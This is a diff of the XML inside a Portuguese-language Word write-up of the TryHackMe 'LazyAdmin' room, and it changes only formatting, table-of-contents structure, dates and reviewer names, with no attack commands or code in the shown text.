+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">para </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">quem deseja </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">praticar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">e aprimorar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>as</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> habilidades</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> no processo de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>pentesting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pBdr>

--- a/TryHackMe/lazyadmin/Eikebarbosa/writeup.docx
+++ b/TryHackMe/lazyadmin/Eikebarbosa/writeup.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -102,34 +102,14 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>Lazy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Admin – </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>TryHackMe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Lazy Admin – TryHackMe</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -236,23 +216,13 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t>LazyAdmin</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> – Eike G. Barbosa</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>LazyAdmin – Eike G. Barbosa</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -358,7 +328,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>30/10/2024</w:t>
+              <w:t>02/10/2025</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -572,7 +542,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Nome do revisor</w:t>
+              <w:t>João Branco</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -595,7 +565,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Orientador</w:t>
+              <w:t>Conselheiro</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -648,7 +618,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Nome do aprovador</w:t>
+              <w:t>João Branco</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -671,7 +641,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Diretor</w:t>
+              <w:t>Conselheiro</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -868,7 +838,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>DD/MM/AAAA</w:t>
+              <w:t>30/10/2024</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -944,7 +914,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>DD/MM/AAAA</w:t>
+              <w:t>02/10/2025</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1020,7 +990,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>DD/MM/AAAA</w:t>
+              <w:t>02/10/2025</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1079,40 +1049,18 @@
         </w:rPr>
       </w:pPr>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepNext/>
-        <w:keepLines/>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Sumário</w:t>
-      </w:r>
-    </w:p>
     <w:sdt>
       <w:sdtPr>
-        <w:id w:val="-1933657360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:caps w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:id w:val="2112393729"/>
         <w:docPartObj>
           <w:docPartGallery w:val="Table of Contents"/>
           <w:docPartUnique/>
@@ -1121,239 +1069,320 @@
       <w:sdtContent>
         <w:p>
           <w:pPr>
-            <w:pBdr>
-              <w:top w:val="nil"/>
-              <w:left w:val="nil"/>
-              <w:bottom w:val="nil"/>
-              <w:right w:val="nil"/>
-              <w:between w:val="nil"/>
-            </w:pBdr>
+            <w:pStyle w:val="CabealhodoSumrio"/>
+          </w:pPr>
+          <w:r>
+            <w:t>Sumário</w:t>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Sumrio1"/>
             <w:tabs>
-              <w:tab w:val="right" w:pos="8494"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
             </w:tabs>
-            <w:spacing w:after="100"/>
             <w:rPr>
-              <w:color w:val="000000"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
+              <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
           <w:r>
             <w:fldChar w:fldCharType="begin"/>
           </w:r>
           <w:r>
-            <w:instrText xml:space="preserve"> TOC \h \u \z \t "Heading 1,1,Heading 2,2,Heading 3,3,"</w:instrText>
+            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
           </w:r>
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_heading=h.gjdgxs">
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
+          <w:hyperlink w:anchor="_Toc210330561" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>Contextualização</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:color w:val="000000"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
-              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc210330561 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pBdr>
-              <w:top w:val="nil"/>
-              <w:left w:val="nil"/>
-              <w:bottom w:val="nil"/>
-              <w:right w:val="nil"/>
-              <w:between w:val="nil"/>
-            </w:pBdr>
+            <w:pStyle w:val="Sumrio1"/>
             <w:tabs>
-              <w:tab w:val="right" w:pos="8494"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
             </w:tabs>
-            <w:spacing w:after="100"/>
             <w:rPr>
-              <w:color w:val="000000"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
+              <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_heading=h.1fob9te">
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
+          <w:hyperlink w:anchor="_Toc210330562" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:t>Desenvolvimento</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:color w:val="000000"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc210330562 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pBdr>
-              <w:top w:val="nil"/>
-              <w:left w:val="nil"/>
-              <w:bottom w:val="nil"/>
-              <w:right w:val="nil"/>
-              <w:between w:val="nil"/>
-            </w:pBdr>
+            <w:pStyle w:val="Sumrio1"/>
             <w:tabs>
-              <w:tab w:val="right" w:pos="8494"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
             </w:tabs>
-            <w:spacing w:after="100"/>
-            <w:ind w:left="220"/>
             <w:rPr>
-              <w:color w:val="000000"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
+              <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_heading=h.3znysh7">
-            <w:r>
-              <w:t>What is the user flag?</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
+          <w:hyperlink w:anchor="_Toc210330563" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Conclusão</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
-              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc210330563 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pBdr>
-              <w:top w:val="nil"/>
-              <w:left w:val="nil"/>
-              <w:bottom w:val="nil"/>
-              <w:right w:val="nil"/>
-              <w:between w:val="nil"/>
-            </w:pBdr>
+            <w:pStyle w:val="Sumrio1"/>
             <w:tabs>
-              <w:tab w:val="right" w:pos="8494"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
             </w:tabs>
-            <w:spacing w:after="100"/>
-            <w:ind w:left="220"/>
             <w:rPr>
-              <w:color w:val="000000"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
+              <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_heading=h.2et92p0">
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-              </w:rPr>
-              <w:t>What is the root flag?</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
+          <w:hyperlink w:anchor="_Toc210330564" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Referências</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc210330564 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
           </w:hyperlink>
-          <w:r>
-            <w:rPr>
-              <w:color w:val="000000"/>
-            </w:rPr>
-            <w:t>9</w:t>
-          </w:r>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pBdr>
-              <w:top w:val="nil"/>
-              <w:left w:val="nil"/>
-              <w:bottom w:val="nil"/>
-              <w:right w:val="nil"/>
-              <w:between w:val="nil"/>
-            </w:pBdr>
-            <w:tabs>
-              <w:tab w:val="right" w:pos="8494"/>
-            </w:tabs>
-            <w:spacing w:after="100"/>
-            <w:rPr>
-              <w:color w:val="000000"/>
-              <w:sz w:val="24"/>
-              <w:szCs w:val="24"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_heading=h.1t3h5sf">
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-              </w:rPr>
-              <w:t>Conclusão</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-          </w:hyperlink>
-          <w:r>
-            <w:rPr>
-              <w:color w:val="000000"/>
-            </w:rPr>
-            <w:t>11</w:t>
-          </w:r>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pBdr>
-              <w:top w:val="nil"/>
-              <w:left w:val="nil"/>
-              <w:bottom w:val="nil"/>
-              <w:right w:val="nil"/>
-              <w:between w:val="nil"/>
-            </w:pBdr>
-            <w:tabs>
-              <w:tab w:val="right" w:pos="8494"/>
-            </w:tabs>
-            <w:spacing w:after="100"/>
-            <w:rPr>
-              <w:color w:val="000000"/>
-              <w:sz w:val="24"/>
-              <w:szCs w:val="24"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_heading=h.4d34og8">
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-              </w:rPr>
-              <w:t>Referências</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="000000"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-          </w:hyperlink>
-          <w:r>
-            <w:rPr>
-              <w:color w:val="000000"/>
-            </w:rPr>
-            <w:t>11</w:t>
-          </w:r>
         </w:p>
         <w:p>
           <w:r>
+            <w:rPr>
+              <w:b/>
+              <w:bCs/>
+            </w:rPr>
             <w:fldChar w:fldCharType="end"/>
           </w:r>
         </w:p>
@@ -1498,68 +1527,78 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_heading=h.gjdgxs" w:colFirst="0" w:colLast="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Ttulo1"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_Toc210330561"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Contextualização</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
